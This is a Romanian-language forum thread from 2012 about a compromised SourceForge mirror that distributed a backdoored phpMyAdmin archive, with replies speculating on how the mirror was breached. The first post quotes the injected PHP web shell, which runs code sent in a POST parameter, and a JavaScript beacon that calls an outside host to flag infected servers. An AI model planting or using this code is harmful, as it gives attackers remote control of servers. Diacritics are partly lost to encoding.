B7ackAnge7z Posted September 27, 2012 Report Posted September 27, 2012 De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP:<?php @eval($_POST['c']); ?>De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate):var icon ;icon = document.createElement("img");icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";icon.width=0;icon.height=0;document.body.appendChild(icon);Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor.Sursa: Compromised SourceForge mirror 1 Quote
B7ackAnge7z Posted September 27, 2012 Author Report Posted September 27, 2012 Si... Cum a ajuns acolo? Eu speram c? administra?ia SourceForge.Net va publica mai târziu detalii despre ce ?i cum s-a întâmplat acest lucru. Pân? acum — nimic. Îns?, dat fiind faptul c? a fost compromis doar serverul cdnetworks-kr-1.dl.sourceforge.net, putem presupune c? vinovat se face provider-ul ce de?ine(a) acest server. Quote
AltraX Posted September 29, 2012 Report Posted September 29, 2012 Da. Imi pare rau pentru cei "400" . Da si eu speram ca administratia SourceForge.Net sa publice detali despre cum sa putut intampla una ca asta. Quote